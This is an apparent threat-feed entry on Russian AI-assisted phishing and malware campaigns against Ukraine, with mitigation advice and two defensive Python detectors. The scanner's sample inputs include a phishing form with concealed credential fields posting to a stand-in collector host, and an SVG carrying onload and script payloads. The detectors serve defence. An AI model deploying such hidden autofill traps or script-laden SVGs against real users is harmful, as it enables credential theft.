
From Phishing to Malware: AI Becomes Russia's New Cyber Weapon in War on Ukraine

Medium
Malware
Published: Thu Oct 09 2025 (10/09/2025, 09:10:00 UTC)
Source: The Hacker News

Description

Russian hackers' adoption of artificial intelligence (AI) in cyber attacks against Ukraine has reached a new level in the first half of 2025 (H1 2025), the country's State Service for Special Communications and Information Protection (SSSCIP) said. "Hackers now employ it not only to generate phishing messages, but some of the malware samples we have analyzed show clear signs of being generated

AI-Powered Analysis

AI analysis last updated: 10/09/2025, 10:45:26 UTC

Technical Analysis

In the first half of 2025, Russian cyber threat actors escalated their use of artificial intelligence (AI) to increase the sophistication and scale of cyber attacks against Ukraine, as reported by Ukraine's State Service for Special Communications and Information Protection (SSSCIP). AI is leveraged not only to automate and personalize phishing campaigns but also to generate malware code, exemplified by the PowerShell-based WRECKSTEEL malware and other AI-assisted data stealers. The campaigns target a broad spectrum of Ukrainian entities, including defense forces, government bodies, critical infrastructure, and innovation sectors.

Phishing attacks employ tactics such as booby-trapped RAR archives and weaponized SVG files to deliver stealers like HOMESTEEL, GIFTEDCROOK, Amatera, and Strela Stealer. Additionally, the Sandworm group and APT28 exploit zero-day and known vulnerabilities in the widely used webmail platforms Roundcube and Zimbra (e.g., CVE-2023-43770, CVE-2024-37383, CVE-2025-49113, CVE-2024-27443, CVE-2025-27915) to conduct zero-click attacks that steal credentials and contact lists and forward emails to attacker-controlled mailboxes. These attacks use stealth techniques such as hidden HTML input fields with autocomplete enabled, which cause the browser or webmail client to fill in stored credentials that are then exfiltrated.

Russian threat actors also increasingly abuse legitimate cloud and communication services (Dropbox, Google Drive, OneDrive, Bitbucket, Cloudflare Workers, Telegram, and others) to host malicious payloads or exfiltrate data, complicating detection and attribution. This cyber campaign is integrated into a hybrid warfare strategy that synchronizes cyber operations with kinetic military actions. The threat landscape is fluid, with multiple Russian APT groups actively targeting sectors critical to national security and infrastructure resilience.

The use of AI in malware development and phishing enhances attack automation, evasion, and effectiveness, signaling a shift in adversary capabilities that defenders must urgently address.
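The two delivery tricks described above, weaponized SVG attachments and concealed credential-autofill fields, are both visible in the message content itself. The following scanner is an added example written for this analysis; it is not code from SSSCIP, The Hacker News, or this feed. It uses only the Python standard library, and the phishing body, the SVG attachment and the field-name heuristics are constructed assumptions, not samples from the reported campaign.

```python
"""Content checks for two phishing delivery tricks: script-capable SVG
attachments and concealed <input> fields that browsers will still autofill.

Added example, not code from SSSCIP, The Hacker News or this feed.
Standard library only; all sample inputs below are constructed.
"""
import re
from html.parser import HTMLParser

# Heuristics (assumptions): field names that autofill will populate, and
# inline styles that keep a field present in the DOM but out of sight.
CREDENTIAL_NAME = re.compile(r"user|login|email|pass|pwd|token|otp", re.I)
CONCEALING_STYLE = re.compile(
    r"display\s*:\s*none|visibility\s*:\s*hidden|opacity\s*:\s*0(?![.\d])|left\s*:\s*-\d{3,}px",
    re.I,
)
EVENT_HANDLER = re.compile(r"^on[a-z]+$")


class _TagCollector(HTMLParser):
    """Records every start tag with lower-cased tag and attribute names."""

    def __init__(self):
        super().__init__()
        self.tags = []

    def handle_starttag(self, tag, attrs):
        self.tags.append((tag.lower(), {k.lower(): (v or "") for k, v in attrs}))

    handle_startendtag = handle_starttag  # treat <x/> the same as <x>


def _tags(markup):
    collector = _TagCollector()
    collector.feed(markup)
    collector.close()
    return collector.tags


def _concealed(attrs):
    """True when the element is in the DOM but not visible to the user."""
    return "hidden" in attrs or bool(CONCEALING_STYLE.search(attrs.get("style", "")))


def find_hidden_autofill_inputs(html):
    """Flag <input> fields that are concealed yet still eligible for autofill:
    the pattern used to lift stored credentials without any user interaction."""
    findings = []
    for tag, attrs in _tags(html):
        if tag != "input":
            continue
        autocomplete = attrs.get("autocomplete", "").strip().lower()
        if autocomplete == "off":
            continue  # cannot be autofilled
        name = attrs.get("name") or attrs.get("id") or ""
        credential_like = bool(CREDENTIAL_NAME.search(name)) or autocomplete not in ("", "on")
        if _concealed(attrs) and credential_like:
            findings.append({"name": name, "autocomplete": autocomplete or "(default)"})
    return findings


def find_active_svg_content(svg):
    """Flag script-capable constructs in an SVG document; a plain image has none."""
    findings = []
    for tag, attrs in _tags(svg):
        if tag == "script":
            findings.append((tag, "embedded script"))
        elif tag == "foreignobject":  # HTMLParser lower-cases foreignObject
            findings.append((tag, "foreignObject can embed arbitrary HTML"))
        for key, value in attrs.items():
            if EVENT_HANDLER.match(key):
                findings.append((tag, f"event handler {key}"))
            elif key in ("href", "xlink:href") and value.strip().lower().startswith("javascript:"):
                findings.append((tag, "javascript: URL"))
    return findings


def triage_message(html_body, attachments):
    """attachments: list of (filename, text). Returns (suspicious, per-source report)."""
    report = {"body": find_hidden_autofill_inputs(html_body)}
    for filename, content in attachments:
        if filename.lower().endswith(".svg"):
            report[filename] = find_active_svg_content(content)
    return any(report.values()), report


# Constructed samples (not from the reported campaign).
SAMPLE_BODY = """<html><body><p>Your mailbox quota will be reduced unless you confirm below.</p>
<form action="https://collector.example.invalid/submit" method="post">
  <input name="username" autocomplete="username" style="position:absolute; left:-9999px">
  <input name="password" type="password" autocomplete="current-password" style="display:none">
  <input type="submit" value="Confirm">
</form></body></html>"""

SAMPLE_SVG = """<svg xmlns="http://www.w3.org/2000/svg" width="10" height="10" onload="alert(1)">
  <foreignObject width="10" height="10">
    <body xmlns="http://www.w3.org/1999/xhtml"><script>alert(1)</script></body>
  </foreignObject>
</svg>"""

BENIGN_SVG = '<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 10 10"><circle cx="5" cy="5" r="4" fill="blue"/></svg>'

if __name__ == "__main__":
    suspicious, report = triage_message(SAMPLE_BODY, [("invoice.svg", SAMPLE_SVG), ("logo.svg", BENIGN_SVG)])
    print("suspicious:", suspicious)
    for source, hits in report.items():
        print(f"  {source}: {hits}")
```

The checks are deliberately structural rather than signature-based: a legitimate sign-in form has visible fields, and a legitimate image has no script, event handlers or foreignObject, so either finding is worth quarantining the message regardless of how the surrounding text was generated.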

Potential Impact

European organizations, particularly those in countries with close political, economic, or military ties to Ukraine or involved in defense, energy, and critical infrastructure sectors, face heightened risks from spillover or targeted attacks leveraging similar AI-enhanced tactics. The exploitation of widely deployed webmail platforms like Roundcube and Zimbra poses a direct threat to European entities using these services, potentially leading to credential theft, unauthorized email access, and data breaches. The abuse of legitimate cloud services for malware hosting and data exfiltration complicates detection and response efforts, increasing the risk of prolonged undetected intrusions. The integration of AI in malware generation and phishing campaigns may result in more convincing social engineering attacks, increasing the likelihood of successful compromises. Hybrid warfare tactics combining cyber and kinetic operations could destabilize critical infrastructure and disrupt essential services, with cascading effects across European supply chains and security frameworks. The evolving threat landscape demands heightened vigilance and adaptive defense strategies to mitigate potential operational, financial, and reputational damages.

Mitigation Recommendations

European organizations should:

- Prioritize patching and updating webmail platforms such as Roundcube and Zimbra to remediate known vulnerabilities (e.g., CVE-2023-43770, CVE-2024-37383, CVE-2025-49113, CVE-2024-27443, CVE-2025-27915) and prevent zero-click credential theft.
- Deploy advanced email security solutions capable of detecting AI-generated phishing content and weaponized file attachments, including booby-trapped archives and malicious SVG files.
- Implement strict monitoring and anomaly detection on cloud service usage to identify unusual hosting or data exfiltration activity that leverages legitimate platforms like Dropbox, Google Drive, and Telegram.
- Enhance endpoint detection and response (EDR) capabilities with AI-aware threat intelligence to identify novel AI-generated malware signatures and behaviors.
- Conduct targeted user awareness training focused on recognizing sophisticated AI-driven phishing attempts and social engineering tactics.
- Employ multi-factor authentication (MFA) across all critical systems to reduce the impact of credential compromise.
- Establish incident response playbooks that integrate hybrid warfare scenarios, ensuring coordination between cyber and physical security teams.
- Collaborate with national cybersecurity agencies and information sharing organizations to stay informed on emerging AI-enabled threats and indicators of compromise (IOCs).
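The recommendation to monitor cloud service usage for unusual hosting or exfiltration activity is easiest to act on from proxy logs. The following detector is an added example written for this analysis, not code from SSSCIP, The Hacker News or this feed. It assumes a simple key=value proxy log format (constructed) and an illustrative mapping of service names to domains; both the log format and the domain list are assumptions to be adapted to your own proxy and environment. It flags a (source host, service) pair when uploads exceed a byte threshold, or when the host contacts a service that is not in its known-use baseline at all.

```python
"""Baseline-and-volume check for traffic to legitimate cloud and messaging services.

Added example, not code from SSSCIP, The Hacker News or this feed.
Assumes a constructed key=value proxy log format and an illustrative domain map.
"""
import re
from collections import defaultdict

# Assumption: illustrative domains for the services named in the report.
SERVICE_DOMAINS = {
    "dropbox": ("dropbox.com", "dropboxapi.com"),
    "google_drive": ("drive.google.com",),
    "onedrive": ("onedrive.live.com", "1drv.ms"),
    "bitbucket": ("bitbucket.org",),
    "cloudflare_workers": ("workers.dev",),
    "telegram": ("api.telegram.org", "t.me"),
}
UPLOAD_METHODS = {"POST", "PUT", "PATCH"}

# Constructed log format: "<ts> src=<ip> method=<verb> host=<fqdn> bytes_out=<n>"
LINE_RE = re.compile(
    r"(?P<ts>\S+) src=(?P<src>\S+) method=(?P<method>[A-Z]+) host=(?P<host>\S+) bytes_out=(?P<bytes_out>\d+)"
)


def classify_host(host):
    """Map a destination hostname to a tracked service name, or None."""
    host = host.lower().rstrip(".")
    for service, domains in SERVICE_DOMAINS.items():
        for domain in domains:
            if host == domain or host.endswith("." + domain):
                return service
    return None


def parse_line(line):
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    rec = m.groupdict()
    rec["bytes_out"] = int(rec["bytes_out"])
    return rec


def detect_cloud_abuse(lines, baseline, upload_threshold=5 * 1024 * 1024):
    """baseline: {src_host: set(services that host is known to use)}.
    Returns alerts for (src, service) pairs that upload at least
    upload_threshold bytes or touch a service absent from the host's baseline."""
    upload_bytes = defaultdict(int)
    requests = defaultdict(int)
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue  # unparseable line; a production job would count these
        service = classify_host(rec["host"])
        if service is None:
            continue  # not one of the tracked services
        key = (rec["src"], service)
        requests[key] += 1
        if rec["method"] in UPLOAD_METHODS:
            upload_bytes[key] += rec["bytes_out"]

    alerts = []
    for (src, service), count in requests.items():
        sent = upload_bytes[(src, service)]
        reasons = []
        if sent >= upload_threshold:
            reasons.append(f"uploaded {sent} bytes (threshold {upload_threshold})")
        if service not in baseline.get(src, set()):
            reasons.append("service not in this host's baseline")
        if reasons:
            alerts.append({"src": src, "service": service, "requests": count,
                           "upload_bytes": sent, "reasons": reasons})
    return sorted(alerts, key=lambda a: (-a["upload_bytes"], a["src"], a["service"]))


# Constructed sample log and baseline (not real traffic).
SAMPLE_LOG = [
    "2025-10-09T09:12:01Z src=10.1.2.3 method=GET host=drive.google.com bytes_out=512",
    "2025-10-09T09:12:05Z src=10.1.2.3 method=PUT host=drive.google.com bytes_out=204800",
    "2025-10-09T09:14:22Z src=10.1.2.44 method=POST host=api.telegram.org bytes_out=8192",
    "2025-10-09T09:14:40Z src=10.1.2.44 method=POST host=content.dropboxapi.com bytes_out=6291456",
    "2025-10-09T09:15:03Z src=10.1.2.9 method=GET host=example-app.workers.dev bytes_out=300",
    "2025-10-09T09:16:10Z src=10.1.2.3 method=GET host=intranet.example.invalid bytes_out=100",
]
BASELINE = {"10.1.2.3": {"google_drive"}, "10.1.2.44": {"dropbox"}}

if __name__ == "__main__":
    for alert in detect_cloud_abuse(SAMPLE_LOG, BASELINE):
        print(alert)
```

Because these destinations are legitimate, blocking them outright is rarely an option; the baseline turns the question from "is this domain bad" into "does this host normally talk to this service, and at this volume", which is the distinction the report's abuse pattern requires.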


Technical Details

Article Source
URL: https://thehackernews.com/2025/10/from-phishing-to-malware-ai-becomes.html (fetched 2025-10-09T10:45:05.770Z, 1136 words)

Threat ID: 68e7923401b7ab9c73cb0c71

Added to database: 10/9/2025, 10:45:08 AM

Last enriched: 10/9/2025, 10:45:26 AM

Last updated: 10/9/2025, 3:20:12 PM